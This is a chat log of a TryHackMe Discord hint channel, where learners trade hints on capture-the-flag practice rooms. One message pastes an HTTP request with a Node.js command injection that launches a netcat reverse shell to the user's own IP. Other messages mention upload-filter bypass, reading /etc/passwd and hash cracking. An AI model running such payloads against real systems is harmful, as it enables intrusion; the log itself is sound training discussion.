#room-hints

google how to automate tasks in linux

Hello I'm stuck at Overpass 3, I'm now user paradox using backdoor but I'm not sure how to get flag in user james, any tips / hints? Thanks!!!

Did you run linpeas?

can't find .cron and the like doesn't fit

Not yet, lemme give it a try, thanks!!!

what?

systemd

redacted

Hi, in OWASP room task 5, couldn't print out the shell with $SHELL and i can't find any other way to do so. any hints please??

hello guys can you some one give me hint in room : https://tryhackme.com/room/lunizzctfnd i have been 4 hours and i try to git something but i couldn't i just found user : runckeck mysql and password : CTF_Script ....
i tryed to connect mysql to passwrd and user and then could just what i found in databases runornot and his valu run = 0
pleas some one give hinte

You have RCE. Get a reverse shell. Look in /etc/passwd once you have done that.

Or look in /etc/passwd using that command injection

you'll get a fair bit of extra info but try env

How to see my machine ip

I have got the attack box ip

Click "Start machine"

I am a beginner, pls help, room is web fundamentals ctf

Click the button that says Start Machine.

I am starting attack machine

No.

It is giving an ip

Click the button that says "Start Machine". Not "Start AttackBox".

Please listen.

Start machine is deactivated....any idea why?

Because you already started it?

Refresh.

Okay checking out

Okayy thanks @stuck fractal

no one her ??

you need hints?

@cedar axle yes read above

thanks

??

Can I send a set a cookie request with a POST request or it happens only with a GET req?

It's not a cookie request.

You can send a cookie with any type of HTTP request

You can receive a cookie from any type of http request

Hi fellows

Do not provide or ask for help or hints for the AllSignsPoint2Pwnage room until 12th April, 7pm (GMT)

I am working in Brainstorm room

I get the numbers of Port opens

But it Is not working in the room my answer

Does anyone has the same problem?

Real number open Port Is different from the answer expected

Brainstorm room

what most common wordpress username ?

usually something with admin in it

If you're asking for a hint for a thm room, the bare minimum information you should provide is room&task&question.
If it's a generic question, #infosec-general

yeah i found the thing

guys what type of this : LS0tLS0gLI..

Room, task, question.

@stuck fractal | James are you the one who made Da9py Bugle room ?

No?

nvm i found an exploit on git hub

for the kind of vulns and the auth of that exploit is a tryhackme room maker so i though it was you

I use my username everywhere

@stuck fractal do you have any idea for this LS0tLS0gLi0tL

Yes

But you did not specify the room or task or question, or what you're already tried

So I am not going to answer

@stuck fractal can i ask bout for a hint on the Daily Bugle priv_esc ?

@stuck fractal yes in room the flags

No because I dislike it, and I can't really hint without spoiling anything. WWW-data?

yeha www

That does not answer anything that I asked for.

I think linpeas should pick it up?

hmmm

@stuck fractal i am in the room : https://tryhackme.com/room/c4ptur3th3fl4g

i want just know type of this : LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS

no One her ??

Be patient.

most likely a cipher

Try things first. Look at the start and the end.

It's not

ok i will try

Multiple encoding

yo can anyone help me with the room remux the tmux

This is the room hints channel here people will provide u with hints u dont have ask just ask ur question.

I am working on lianyu. I'm trying to find the web directory. I tried wfuzz with 4-digits-0000-9999.txt but got nothing. Am I doing something wrong?

its not on the root of the site

thank you

Hello guys, any hint on the root for Ignite?
https://tryhackme.com/room/ignite

@humble siren did you root ignite yet

in the glitch room, i cannot use the netcat exploit of CurlS..Please help me

this is the response i got back from the webserver

hello???

It's really blurry to see what you put

ok wait

POST /api/items?cmd=require("child_process").exec('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<MY IP>%204445%20%3E%2Ftmp%2Ff') HTTP/1.1
Host: 10.10.186.126
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: token=*********************
If-None-Match: W/"a9-0aR6bAfiK/DB+A79vs3kEEVvJNc"
Connection: close

HTTP/1.1 502 Bad Gateway
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Apr 2021 11:34:55 GMT
Content-Type: text/html
Content-Length: 584
Connection: close

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

response i got

help please

Please be calm and patient. Everyone here is a volunteer.

sorry

Yes i didn't, it was literally so stupid i forgot to try it...

anyone available for a little nudge on ustoun

???

Hey, I am doing Nessus room but I am getting wrong answer info even I think that's correct?

I also felt the same for the first time but wait for apache http server version

lol, my bad it turns out I was looking at wrong thing not the Apache HTTP server version

Hey guys , someone have a small hint on "Theseus" room ? 😄

BTW I'm at the very beginning ^^ ( I didn't expect to be stuck SO FAST 😭 )

I believe that room is no help or hints

list

@stuck fractal oh I didn't see it on the pin message

sorry

Is it not in the room text?

maybe I miss something 😄

In the task text in the room

Not in this discord channel

OH ok 😄 my bad !

got it 😉

Hey, I am stuck with Relevant room. To run this exploid https://www.exploit-db.com/exploits/42315 I need impacket for python2 or mysmb for python3. But I can't find thiese modules.

Read through the exploit .py

good day gents may I get a hint in room network services 2 Enumerating NFS task 3 question 6 as i get the file but there is nothing inside am im just doing something wrong?

I added file https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py renamed with mysmb.py. Exploit looks like python2 script. But I can't run it without impacket. With python3 and mysmb.py file added i getting this

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

python3 get-pip.py

This resolved the issue for me

sorry not helped for me..

Did you try to uploading a shell to the smb share?

hi, someone to help with vulnnetDotPy please?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Do not provide or ask for help or hints for the Sakura Room room until 14th April, 7pm (GMT)

help please stuck in room https://tryhackme.com/room/hardeningbasicspart2 task2 question2 This is a random, arbitrary number, used as the session key, that is used to encrypt GPG what are they asking for the info in the room itself google and the gpg man page all say the same thing but its not the correct answer?

Hi all. Stuck in Investigating Windows 3.0, task #16, "This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)"

I know that the framework and variable are swapped in order. I've looked in Event Viewer, decoding payloads to see if I can't figure out how the network connections were formed. Can anyone let me know if I am headed in the right direction?

EDIT: Solved

hi

guys i hust solved tokyo ghoul room

but i didn't know the answer for question 1 in the third task

like i got the note and extracted the information from it

what is the answer for that question lol

ok never mind i figured it out

@light phoenix Please read the pinned messages, Rule 13 applies here

Anyone on sakura room ?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

As I said before.

I am doing OWASP-Juice-Shop and when I need to reset password, security question is "Mother's maiden name?". I can't find it can someone help, I know it needs to do something with james t kirk

trying the dogcat room now and im really stuck with the first part

i tried playing around with the get parameter but nothing seems to work

im totally lost

If you wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would you use?

with that question

because when I search for "sudo program buffer overflow" only 2021 and 2019

omg

nvm

its the 2019 one

ughh that took me 30 mins

Try checking out the || Fandom || biographies.

I need some help on the XSS part of the owasp top 10 room

it says add a commend and see if you're able to insert your own HTML, and I used document.write("test") and overwrote the entire site with test but didnt get a flag?

nvm figured it out 🙂

Hi All! I was flying through the new Sakura room this morning, found username, real name took ages, currency etc, but now stuck on the wallet address. Everything I've read suggests you cant just link a wallet to an email. I've tried several searches from starting point https://www.aware-online.com/osint-tools/web-archive-tools/ and I've waded through Github code but no wallet address for the attcker is jumping out at me. Any pointers much appreciated 😉

Check this: #room-hints message

The room is under hint/help embargo for 2 more days, for now keep trying, or come back once the embargo lifts and we'll be happy to help

Nvm! :)

Im on owasptop10 room and cant find full name of Tomcat developer

Can anyone give me a hint what should be those 3 letters?

The

Already tried

Check the developers.

It's not the person

Omg

u serious

haha thanks

hey guuys!

Can u help me finishe the room "how to use try hack me"? there's this question "On your machine (right-hand side), lets list what files and folders there are. We can do this by typing "ls". What is the name of the folder you see?" i've already did that and after I wrote the name of the folders that I saw, but doesn't work. I feeling so dumb now, but I really can't resolve, please help meee

Did you click "Start Machine" or "Start Attackbox"?

yeess

Which one?

but I dont now the answer do the second question https://tryhackme.com/room/howtousetryhackme

Which of those two buttons did you press?

start machine

!docs verify

Please follow these steps, then screenshot what you're seeing RN

okok

@meager dune Not there. Screenshot on tryhackme, when you run ls

Aahh im sorry haha
My acess finished for today

You don't need the attackbox for this, the fact your access expired means you had the wrong machine deployed.

room :Advent of Cyber 2 [2020] , stuck on upload restrictions bypassing

any help ??

What Task is it?

thanks dude .. i solve it , the restriction was on the filename not the mime type and it was on Advent of Cyber 2 [2020] DAY 2

shell.php wont upload .. but shell.php.jpg will do the job , the web app only check the suffix

-warn @restive grail Do not provide help or hints on new rooms, that room is under help and hints embargo (Rule 13).

⚠ Warned express#7904

sorry I didn't know it was a hint

This is the hints channel. You provided them information to help them with the room. A hint.

Hey, just a question or this is right behavior. Internal room loading with ruined template, without CSS and when I push 'Log in' I am redirected to broken http://internal.thm/blog/wp-login.php

ok strange looks like working for others..

sorry my fail: add internal.thm/blog to /etc/hosts

Gys i need help in SUID

can any one tell what's the wrong with that

You were answered in #general
Please don't ask the same question over multiple channels, although this channel was correct

ok @stuck fractal

hi guys, can you help me i am stuck at task 4 - room How websites work . i didnt find the answer about 1 hour

did you get you answer

yeah

thanks for the response

what are you trying as the answer currently? can you put it in spoiler tags please, also what did you search to find the cve?

got it. apparently there is another way to get in via ftp

Hope everyone is doing good! I need a hint for the linux Agency room, task 3.30. I'm looking for Viktor's flag, logged via ssh as mission30. According to the link that hinted at a 'time machine', I've been trying to read .bak files and snaps that could help me, but didn't find anything useful (there's a source.bak that kinda reminded me of the source.py script in our home directory, but it doesn't seem related).
I've also noticed the .bash_history file that's redirected to /dev/null, and I've been willing to revert that link to make it print on the console again. Am I on the right track or would that be a waste of time?

I've also noticed the .bash_history file that's redirected to /dev/null, and I've been willing to revert that link to make it print on the console again. Am I on the right track or would that be a waste of time? That's something practically all rooms will have, to hide what commands the creator ran.

thanks James. Yeah, some rooms that don't hide it make it pretty easy for us. So I'm at loss. I'll research what they refer to with a programmer's time machine (I guess it's inside the machine and not on github or something?)

Got it, was once again chasing clouds!

i m stuck.I could only find flag24.Could you give a lil nudge how you found the password for mission1 user?

anyone want to give a nudge on linux agency. on how to proceed further.I m cureently user agent47

Got stuck in the johntheripper TASK 08 CUSTOM Rules

What does custom rules allows us to exploit??

Got the answer: Password complexity predictability 💯

The password is the flag

But i cannot find the password for mission1 user.I am currently logged in as user agent 47

You need to find the flag then

Generally via privesc

found the first 3 flags.

I m struck at challenge 3.4 and the hints says maybe you are too feline😅 .I cannot crack it

ur using the cat command too much

duddeeee.I missed it completely.Thanks for the help

check some .history, if i remember it right u can find it there

found it

Sakura is still under embargo

oh ok.. still trying my best thank you

has anyone done Vulnnet: Dotpy, that I could message - I was stumped on the initial enumeration for a while. I've read the writeup, and it seems quite guessy, but maybe that was just the writeup?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

Not yet.

so sorry, but o i don't want answer i want hint bro

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

And I'm not your bro, please don't call me bro.

Ok

I could use a hint on the lab task of the room owasp top 10

I've managed to get the admin login to the website, but im not entirely sure where to go from here to be honest, the ssh didn't have the same user:pass

I'm gonna run nikto on it though

Which task?

29

task 29, components with known vulnerabilities - lab

I tried to find some exploits on the apache version but from what I could see there wasn't anything worthwhile, just a DOS and a local thing IIRC

i remember reading ti was vulnerable to XSS but I'm unsure how that would help gain the /etc/passwd file

the hint on the room itself said to search for bookstore vulnerabilities, but that only showed sql injections etc which i already suspected from the start might be possible, but i managed to get the admin hash without injection anyway

You know its a bookstore application, you should check for recent unauthenticated bookstore app rce's.

That's the hint on the room

yeah I just remembered that exploit, I gotta try to fix it though it's giving a traceback error

A traceback is something for developers to try and find the error, it's not a class of error

yeah i know, its saying missing schema

that usually means you need to add http:// to the ip

http://

ohhhhhh yeah that would probably be it 🤦‍♂️

bruh moment it worked, thanks a lot!

np

need some hint in sakura

got the name but not getting the email

can anyone help?

That is still under embargo

Hints are allowed at 7PM GMT tonight

okay

nvm i give up on this room uggg

One more hour :)

two more, daylight savings

guys im doing lazyadmin room any hints, don't know where to start

Start the machine.

lol

jk

nmap shows every port closed

scan again

did that

ports should be open

i have done this room, i dont remember how i did it

i think you need to wait 5-10 minutes for the vm to fully spin up

yeah now its showing some ports

Ok can we talk about the sakura room?

In one hour and 2 minutes

can someone give a hint for lazyadmin room, im stuck at mysql_dump that i got from localhost/inc/

did u check /content/inc?

yeah i got mysql_dump from there

there is username and pass hash in there i believe

i don't know how to crack that hash

use john or hash cat

username is admin i think

idk if it will work with crack station

Or even crackstation if it's not salted

I don't think it's salted

its not salted probably,

yep not salted i got it

i was totally overthinking it

Oh right, GMT != BST

Needs more UTC

hello =) where would i best ask a room creator about a possible ?!? easter egg ?

Which room?

SSTI, he dmed jake on it

Ah

Haven't tried that one yet

Do not provide or ask for help or hints for the Cooctus Stories room until 17th April, 7pm (GMT)

Is it okey to ask a hint for Sakura Room now ?

Yep

did u guys use wigle to find the bssid

or what

Yup

Trying to figure out the coordinates of Mcdonald's but couldn't find

Why McDonald's?

I think there's one nearby. Tbh, I just looked at the town and zoomed in.

To make searching circle smaller 💩

Ah ok. 👍 I took another approach and found it quite quickly. Good luck!

Not all SSIDs are relevant.

Am I the only that that's struggling to find the email? I solved every other question tho 🙃

I was struglling too but the answer is in front of your eyes from the beginning.

I've solved every question ecxept the first question of HOMEBOUND

I cannot get the airport name right

Did u search the picture correctly

I try exif nothing

no need a tool

Yeah that one is tricky, because there's no metadata to help

zoom in and zoom out is enough

I tried to search google for some locations where there's cherry blossom near an airport

Got a couple of location and a few airports.. tried their codes and nothing

Look at other things apart from the cherry blossoms

There's a plane

Its blue and red

I can not finish the room because of BSSID question. Its sad 😦

Have you discovered accounts that belong to the attacker?

Do you need a hint?

Zoom in the country.. i agree its hard to see the site should update their UI

PLS. btw I find the freenet in city

but couşd not filter or sth in city to find bssid

Use both search and filter.

Something that might help you.. solve the last question of the challenge then you will easily get the BSSID

Yeah I completed the task. Found the city name

You're halfway there.

I found twitter and linkedin

Need to find another account

There's one more, try other account discovery tools, you'll get it

the hek, i've been looking for so long and no other account pops

i used like a bunch of differnet tools

:[

@glad thunder then just go to wingle and search for it

Btw i cannot find any clue for the first question of HOMEBOUND.. either Im blind or idk

yeah thats what im doing all the time from the begining

but couldnt find dk1f

Check city view...

DK1F-G

You have to write it exactly

Refresh the page .. i feel like the search is broken for wingle

Sometimes it doesnt work

Which tools did you use?

Exactly!

oh i had also found github

There you go.

i swear i looked at github for so long

and only found no-reply emails

There's a repository that contains something that will lead you to it

You might have better luck with the api but i havent tried it

FINALLY

Thnx guys for helping

You mean on twitter?

yes. There are bunch of pics on twitter.

The skyline

In the cherry blossoms image

Looks like

A tower in canada

Or something

Lol

Check again 🙂

Okay

Good, there's more

Apart from the tower I mean.

Not saying it's definitely Canada

The tower

Seen that in a movie

yeah

I think it was spiderman

great go on

😂

xD

You're on the right track haha

Forgot the location need to check that scene on yt

When you found the city name. I'll say the big hint in picture xD

Finally

I got it

Congrats man

My geography is weak dammit

But dude learned so many things in this room

Dude check the right corner of the pic. And you gonna see a scrulpture

No matter how little the things I learned were
Makes a huge difference

Exactly

Great room !

I see it but i wouldn't be able to identify it

Its so easy to ignore

teah

But thnks for the help

Yeah other rooms seem boring now lol

CyberDetectives ! xD

Ya'll killed it, still impressed on how quickly some folks solved it.

Anyone knows a good alternate for wingle?

Because its truely hard to see when you search for something there

If not why dont we try to dev it

It is really hard to use that tool

wigle works well, it works a LOT better when you're signed in.

When i signed in it throws errors that i had too many search query although i searched only once

So had to logout and use the tool like it is lol

I signed in but so slow to make searching and filtering. scrfolling down or up the map

I managed to solved it quickly because in my mind i already knew the city name

So that was easy

Even though i found the city name, finding bssid is made me crazy xD

It happends.. you just have to take a break then come back

If i never watched spiderman homecoming i wouldn't have been able to solve the that question i was stuck on

I know so little about locations in general

what the syntax to crack sha512 with salt ?

for hashcat

That sounds like a research question

finally got the email, it should not have taken me that long lmao

nvm got it

I needed only 2 parameters for my wigle search to get an exact result

im stuck on user priv esc on overpass3 i found root_squach in /etc/exports but no folder is mounted nor the user /home is 600 only

any hint could help a lot

or thats just a rabbit whole ?

hole *

You can see it from inside the box. You couldn't see it from outside the box. You know the squash is an issue, exploit it.

hey, i need some help getting the bssid from Sakura Room,did anyone find it?

You need to search the SSID found on the dark web site using wigle.net

thanks!

i didnt know about wigle.net

if you go to box author's website, you can find a lot of resources there

anyone got any idea what to do here?

did you use any tool for searching dirs ?

uhm no

Well, server-status is the wrong page

How'd you find server-status?

by running gobuster and it saying 403 - /server-status

idk what the question is asking

So did you use any tool for searching dirs ? - Yes, you did. You used Gobuster.

What else did gobuster find?

everything else was 301 and lead me nowhere

That's not what I asked.

sorry

im fairly new

It wasn't rhetorical, what else did gobuster find?

GoBuster must have found another dirs too

yes /images /css /js /fonts /internal /server-status

cool

actually you find the answer. You only need to check them in web browser as you did before

so what would that look like?

A web page, with an upload form?

whats that...

Do you have any backgorund on comp sci or developing etc. Because if u dont it's gonna be hard for you

try all of them like you tried /server-status

not really sorry do you think its better to move to something easier?

yea but it send me to the page where i cant do anything like on the ss

You can start with Complete Beginner path

https://tryhackme.com/paths

This path is like from 0 to Hero

can confirm, got me from 0 to 1/3 of a Hero

ok thank you i will work on that sorry for the confusion

No problem. Good luck !

can someone nudge me in the right direction for the email on Sakura? i know i'm missing something obvious, but i haven't been able to figure out what since the bloody thing came out

did u find the social media accounts ?

i believe so

the jobby one, the codey one, the birdy one (dodging spoilers)

xD

On the codey one, you need to check a specific repo

One repo will reveal the e-mail

"reveal"

i've been staring at them all ever since i got off work

the only one one that makes sense says it's the same as the master

try looking into pgp

that's me pointed in the right direction

much appreciated

np 🙂

Please check the pinned messages in this channel. 🙂

Ooooh sorry

can I get hint for Sakura ??

yes

where will I find bssid in sakura??

and where to search for email address of sakura?

@limber sphinx

email - one of the social accounts is linked to it

bssid - wigle

@limber sphinx what about the home ?

is wiggle any site??

google it and you'll find out, it's an OSINT room

.

home city?

it's also wifi-related

okay I am getting bit confused in using wiggle, can you help me?? also I am searching google on how to use that

Make sure you are using Wigle (one 'g')

done bruh thanks a lot I got the flag

thanks @pastel beacon @limber sphinx

mine only one left in sakura and it's email address @pastel beacon @limber sphinx can you please help me ??

please

Which social media accounts have you located?

github and linkedin

Okay, so you have the needed platforms

Are there any repos that look like they might be relevant?

okay but I searched everywhere in those but did not get anything

yeah I searched that too

well I am again going to search it thorougly

The email is not going to be in plain text

okay let me check the repositories

Research a bit on some of the repo names and that should help out

okay

@pastel beacon please give some more hints please

Did you look up some of the repo names?

m**ip...

??

Nope

One of the repos is related to encryption

To encrypt messages in this method you need keys to prove who you are

yeah I think it's public keys, is it??

Yes

yeah I opened that file but don't know how to decrypt it

There's a few different ways it can be done. There is a Youtube video (same channel name as the name of the THM room owner) showing how to decrypt it using Linux

There is also stand alone tools that work with that type of encryption

could icyberchef be used to decrypt it??

Yes

okay but where will I get the private key??

You do not need the private key, only the public one

yeah but where will I get that key?

It is in one of the repos

in the same or different repo ??

It is in a repo owned by the account you identified already

okay let me check

@pastel beacon I am getting this when I give that key into the input

In cyber chef?

yeah

@pastel beacon no idea not getting anything

please help

I'm not getting it in CyberChef but I don't recall the recipe that others used, I use the linux method

okay so please send the link of that video which you were recommending

@pastel beacon tell me one thing I got the key and now it is asking for encrypted message, so from where will I get the message

There is no message to decrypt

Information that is given when a key is created can be extracted from the public key

okay let me check

just send me the video

okay got it

thanks bruh

done I have completed the Sakura Room Successfully, Thanks buddies @pastel beacon @limber sphinx thank you so much for your love and support

I want to apply for the badge so what should I give in the url field ??

@pastel beacon

Note: You may only request this special THM badge if you have already obtained at least the OSINT Dojo Student level first.

how to get that student level ??

use your osint skills towork it out!

Lets take this to General so not to clutter the room-hints

On the Sakura room I'm having trouble with the URL from which passwords and SSIDs were saved and with the starting airport. Hints would be appreciated

1st one - there's a hint on the page which is as good as anything. 2nd one, look for any landmarks and zone in on it.

💯

👍

But the URL of deep paste is covered in the image hint and the site isn't accessible atm

the site is only accessible via tor, but I haven't been able to get it working. the screenshot has enough info though

Oohh I got it now

took me a while to spot the landmark

then it was oh, that's ||***********||

Yeah - fortunately it also happened to be the first one I thought of!

I only know one airport in that city so

There are 2. I don't think she left from the answer as that only does domestic flights, but it is the closest

ah yeah good point

any hint on how to get the current twitter handle? smh

search harder

Check the message as mentioned in the text of Background in Task 5

H is right! You'll kick yourself; just pay attention to what Twitter is actually searching

I am at Owasp Top 10, task 19, question 2. I cannot find the hidden credentials. Can someone give me a hint?

Default credentials

I mean those

Can you give me a hint where I can find those?

You have to google it, check your website and check what you could google and then put "default credentials" at the end

if you aren't sure, skip it and come back to it later

But there is written that I can find those in the source code

github

I got it. ty.

I found it in GitHub

Is there an option to find it in the source code?

just read the docs

What are the docs?

documentation

Where can I find those in the source code?

usually in the README.md

Aaaaah

So the hint means that I have to go to GitHub

yeah, I think so

Hi all. sup?

anyone available for some nudges ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

Afternoon all! Hope all is well.
I am stuck on a the Wireshark room, https://www.tryhackme.com/room/wireshark
Task 8, final question. I am unsure what the 'full data string' is.

Worth noting this is looking a the pcap dns+icmp.pcapng

Actually in the SakuraRoom, I enumerated the attacker user name and also found some possible email ids and his name in the organization, But i cant find the exact correct email of the attacker

so i require some nudges in this room

Which online accounts have you found?

I have found linkedin and github accounts

Look into the GitHub account

the URL that was down is back up, go check it out while it lasts 😉

unexpected, i have been looking in the wrong account for this whole time

Try linpeas

Yeah, like Alex said, try linpeas.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

I managed to do it nonetheless, thanks tho

Hey how can I pass this step from Vuneversity, Im with gobuster trying to make a research of Web directories and I cant due to funcionallity of that command

As you can see in the url https:// is replied twice
but when i run the command I cant do it if I dont put the ip from the target with http://
Any posible solution to this?

You spelled HTTP wrong in the URL, it is thinking its part of the url

I cant do it in another way?

If i run the command like that it doesnt works

put http:// before the ip

gobuster dir -u "http://10.10.206.250:3333" -w "/usr/share/worldlists/dirb/indexes.txt"

im trying that now

okey, it doesnt works

look

http is spelled wrong again.

thanks

all the problems was that

im a little bit idiot

I'm doing CooctusVMv2 and I'm stuck on the Szymex flag, I found Paradox but now I don't know what to do.

Is there a way to filter by Opcode in wireshark?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

This is the second time I've had to remind you about the 72 hour rule @restive grail

Sorry @stuck fractal I didn't know about that, my fault I don't read carefully this rule.

Seeing as you were previously warned over it, I doubt that.

Hi guys, in the Sakura room, Taunt section, where should I look for the Twitter handle?

Check the message screenshot in the Background section

Is it possible to get more of a hint? I'm sure it's something incredibly obvious that I'm missing, but all I can see if the obvious handle (which isn't it)

Thank you for helping, by the way 🙂

It's very obvious

I completely believe that! I'll keep on staring at it until something jumps out at me.

try a general search for the username

I knew it would be obvious when I got it! Thanks guys 🙂

it could be a good starting point

twitter has a search feature 😉

Thank you! It was so stupidly simple in the end. D'oh

a lot of that room is though

hydra, what did you use to find the email

what did you find so far?

you may DM if you wish

I haven't done that room (or used wfuzz enough to say), but are you certain the IP is correct? The error message would suggest it's something to do with the network.

just figured it out

gj

Start from 0

And numbers

Not words

Yeah

Well, no, but yes

It's meant to be numbers, right? It's IDOR, you're fuzzing IDs for the notes?

Huh ok, I'm thinking of a different question

NGL I'd use a username wordlist for usernames

you mean we can't use rockyou for everything?

not a username list

guys, can someone pls help me in the ssti room?
it's a quick help, I'm trying to execute the whoami command

but it returns 500 internal server error

Note: Jinja2 is essentially a sub language of Python that doesn't integrate the import statement, which is why the above does not work.

Continue reading the section from the room and you'll see the difference in payload required to exploit it 🙂

ohh thx

now it worked

thank you so much @dusky vigil

Hi. I am doing the Network Services module and would like a hint please. I am on Task 6, Enumerating Telnet, and I have tried doing this twice with the -p- flag and each time it has gone over an hour and the machine loses connection. I know I am doing it right because I get the 0 ports open when I run nmap without the -p- flag (which I did first). So the hint is, please can you give me a broad range for nmap to check so I can complete the question. (eg ports xxx - yyy). Thank you for your help

any hints on Cooctus Stories?

embargo on Cooctus till 17th

Oh! Just checked. Thanks.

need some hints on finding the attacker's twitter handle on the SAKURA room

the right user seems to have no account on the twitter handle

i have no idea where to look 😶

search for the handle

Hello, can anyone help me please for the new cooctus room. I've been on it for hours now and I'm still stuck at the first question

thats where I am stuck 😓

embargo on hints till 17th of April

check the background text, you'll find your answer there

any hint in Sakura room for "What other cryptocurrency did the attacker exchange with using their cryptocurrency wallet?"

go through transactions on their wallet, it's a very specific one that doesn't really change value to USD

#vulnversity Using the nmap flag -n what will it not resolve?

can anyone help with this flag -n what will it not resolve?

Read the manual

has anyone finished the webenumeration room?

Hello guys

I'm following "Web Enumeration" room, Task 9, section "2.2. Practical: WPScan (Deploy #2)", question "WPScan says that this theme is out of date, what does it suggest is the number of the latest version?"

I see result suggestion from wpscan but somehow it is wrong for this test

2.0 doesn't works

Ah i overlooked what was right in front of my eyes

completed the room

Any help plz

ive seen people talk about it this same problem, havnt done it yet.

I think there is a typo somewhere

maybe

try one version back

But wpscan suggested 2.0

Thank you for suggestion

Hi, I am having a "problem" in the "Network Services Room" in Task 4 "Exploiting SMB". I successfully connected to the named SMB-share. I can also see the document which should let me solve the Question "Who can we assume this profile folder belongs to?" but the document is empty when I open it with "more". I saw that Noah and Hydragyrum hinted to download the file locally and open it afterwards. How can I do that please?

get {filename}

use this command and u should get the file in your machine

Hi AllenJo, thanks - for the file name, since it has spaces, I guess that the spaces in the name need to be replaced by back slash ? Or am I totally wrong here

um yeah ig

try it

Not replaced.

Hmm.. Not working.. I put "get Working From Home Information. txt" and it says nt status object name not found

i dont really remember interacting with those files

try putting a back slash and a space

i dont know if we have to put them in quotes or not

Get Working\ From\ Home\ Information.txt same.. Does not find the file

Will try the quotes

go into the directory and get it

Quotes worked!! get "Working From Home Information.txt" thanks👍

I've got bad history working with these files

Hey guys I'm in CC: Pentesting and I've got a question about metasploit

Well.. Anyway you did help out thank you for that :)

No probs

I'm doing the last part of the metasploit session, and I'm starting to understand metasploit, but not really xD

So I'm using nostromo_code_exec with meterpreter, if that makes sense

which task?

Task 10

which question are u stuck at?

Oops, it was section here, sorry

2nd from the end

So everytime I write something in the session in metasploit, it returns me the same thing

is it asking secret dir?

if I write ls, it responds ls

Yes! That one

use command shell

then try ls

I just did it

And started a shell, but it keeps doing the same thing

It responds my ls with ls

then try it with meterpreter

"meterpreter" as a command?

i think just type exit

then u may get meterpreter

then u try ls

replies with exit

I can do background

That still works

!docs verify

try ctrl z

Follow those steps, then you can post an image

background it and try ls

I will do that then

or i think u can try the exploit again, maybe it will work

Okaay! let me try

I'm running it again

so I should use a shell first?

I thought meterpreter was its own shell

without shell u try first

Okay

then u try shell if that dint work

It works different

what does meterpreter do?

Now it doesnt repeat what I type

So it's an improvement

tried shell?

if its a windows machine u have to do dir

in shell

I was doing lcd

When I do ls it returns a list, but I'm not sure if they are files in a folder. I will say they are

You should verify

verify and send pics

Yess, I will

Nice, I'm verifyed

This is what is returned when I type dir

cd into the folder that they asked

i got no problems, i see the secret dir

shell first

pwd is useful 😉

I will shell then

after shell, you cd into that dir

I had to go, so I'm not on the computer anymore 😪 sorry

But I still want to know something, because metasploit is still a mistery to me

it should work after u do shell. or the machine could be broke.

So meterpreter is not a shell itself, right?

in meterpreter we can do some external commands

shell we can only use the commands present in the target machine

It's a type of shell

shell in meterpreter drops you into a system shell on the target

does it go for the python tty?

wat

when we use shell is meterpreter using python -c 'impo......

